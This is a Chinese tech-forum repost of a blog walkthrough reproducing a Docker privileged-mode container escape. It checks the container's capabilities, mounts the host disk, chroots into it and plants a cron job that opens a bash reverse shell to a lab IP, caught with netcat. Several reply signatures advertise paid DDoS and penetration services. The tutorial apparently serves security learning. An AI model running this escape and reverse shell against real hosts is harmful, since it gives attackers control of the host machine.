登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
1
2
/ 2 页
下一页
返回列表
首页
›
业界区
›
科技
›
[docker逃逸] Privileged 特权模式逃逸复现
[docker逃逸] Privileged 特权模式逃逸复现
[ 复制链接 ]
颜清华
2025-6-9 16:00:49
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述
在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问所有设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境配置
以特权模式创建容器
docker pull centos
docker run -itd --privileged centos /bin/bash
复制代码
查看当前是否为docker环境:
cat /proc/1/cgroup|grep docker
复制代码
systemd-detect-virt 也可以判断当前是否为容器
systemd-detect-virt
复制代码
查看当前是否为特权模式
capsh --print
复制代码
cat /proc/self/status | grep CapEff
复制代码
CapEff为0000001fffffffff,当前容器为特权模式。
复现
使用lsblk查看磁盘
挂载宿主机根目录
mkdir test
mount /dev/sds3 test
复制代码
挂载成功
使用chroot切换根目录,方便进行计划任务反弹shell
chroot test
复制代码
创建计划任务
crontab -e
复制代码
*/1 * * * * /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码
攻击机监听反弹shell,成功反弹了宿主机的shell
nc -lvvp 8080
复制代码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
逃逸
docker
Privileged
特权
模式
相关帖子
docker镜像制作(Docker Desktop)
《OpenClaw (Docker手工部署版) 终极避坑与实战指南》
Docker部署Ollama模型
Docker容器化Spring Boot:从构建到部署的完整实战
Docker 容器中运行 AI CLI 工具:用户隔离与持久化卷实战指南
Ubuntu 部署Harbor (Docker版)
1、SEATA分布式事务——XA模式
笔记:WPF MVVM 模式下通过消息机制获取自定义对话框数据
2、SEATA分布式事务——AT模式
Docker容器化部署实战:从零构建Spring Boot微服务镜像
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
docker镜像制作(Docker Desktop)
3
88
神泱
2026-03-19
业界
《OpenClaw (Docker手工部署版) 终极避坑与实战指南》
1
597
损注
2026-03-23
业界
Docker部署Ollama模型
1
771
班嘉淑
2026-03-24
安全
Docker容器化Spring Boot:从构建到部署的完整实战
1
649
胆饬
2026-03-26
业界
Docker 容器中运行 AI CLI 工具:用户隔离与持久化卷实战指南
3
393
类饲冰
2026-03-26
安全
Ubuntu 部署Harbor (Docker版)
1
426
扈怀易
2026-03-26
业界
1、SEATA分布式事务——XA模式
2
974
能杜孱
2026-03-28
安全
笔记:WPF MVVM 模式下通过消息机制获取自定义对话框数据
1
442
锑砖
2026-03-28
安全
2、SEATA分布式事务——AT模式
3
31
申倩语
2026-03-30
安全
Docker容器化部署实战:从零构建Spring Boot微服务镜像
2
439
迁岂罚
2026-04-04
回复
(24)
豌笆
2025-10-17 08:33:53
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢楼主提供!
扎先
2025-10-17 13:23:40
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
暴灵珊
2025-12-21 21:11:14
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢楼主提供!
习和璧
2026-1-19 09:10:13
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,下载保存了,貌似很强大
纪晴丽
2026-1-21 13:00:54
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
分享、互助 让互联网精神温暖你我
蓬庄静
2026-1-24 10:12:36
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
感谢分享,下载保存了,貌似很强大
支智敏
2026-1-25 11:20:54
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢分享,辛苦了
粒浊
2026-1-26 03:55:42
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
用心讨论,共获提升!
赏勿
2026-1-26 07:38:50
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
收藏一下 不知道什么时候能用到
上官银柳
2026-1-26 08:58:49
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
yyds。多谢分享
管水芸
2026-1-30 04:36:31
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
分享、互助 让互联网精神温暖你我
亢安芙
2026-2-4 08:42:36
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
不错,里面软件多更新就更好了
琉艺戕
2026-2-5 04:31:27
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
懂技术并乐意极积无私分享的人越来越少。珍惜
人弧
2026-2-10 05:45:31
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,辛苦了
余思洁
2026-2-10 20:49:32
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
不错,里面软件多更新就更好了
翁真如
2026-2-12 11:08:35
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
热心回复!
焦尔蕾
2026-2-12 23:04:10
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
分享、互助 让互联网精神温暖你我
龙骋唧
2026-2-13 09:41:25
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
新版吗?好像是停更了吧。
嶝扁
2026-2-13 23:17:29
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,试用一下
下一页 »
1
2
/ 2 页
下一页
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
签约作者
程序园优秀签约作者
发帖
颜清华
2026-2-13 23:17:29
关注
0
粉丝关注
24
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991126
anyue1937
9994892
kk14977
6845359
4
xiangqian
638210
5
神泱
9516
6
宋子
9876
7
韶又彤
9909
8
荪俗
8990
9
蓬森莉
9868
10
俞瑛瑶
10000
查看更多
今日好文热榜
392
如何在手机微信上免费批量删除PDF页面?
653
龙芯2k0300 - 走马观碑组Gazebo仿真环境搭
5
理论都会,实战就废?7个分析模板,帮你打
444
开源重置 沙丘2 游戏 · Dune Legacy
957
vue3这些常见指令你封装了吗
423
【Ubuntu】配置 WSL 环境时,启动虚拟机平
3
Flutter3.41+DeepSeek智能AI应用|flutter3+
274
深度解析Claude Code 51万行源码背后的设计
816
AI时代的变更到底怎么管?(抛砖引玉版)
698
OJ平台远端代码沙箱开发第一周:需求拆解与
979
万字详解 RAG 基础概念:什么是 RAG? 为什
398
天谋科技入选北京市 2026 年第一批专精特新
160
AI对普通人到底有什么用?这8个场景告诉你
81
【节点】[Reciprocal节点]原理解析与实际应
254
为什么使用 Skillsbase 维护自己的 Skills
369
WorkBuddy:快速开启龙虾(OpenClaw)之旅
541
为什么使用 Skillsbase 维护自己的 Skills
869
为什么使用 Skillsbase 维护自己的 Skills
192
为什么使用 Skillsbase 维护自己的 Skills
689
自我即自感:一种极简存在论(四篇)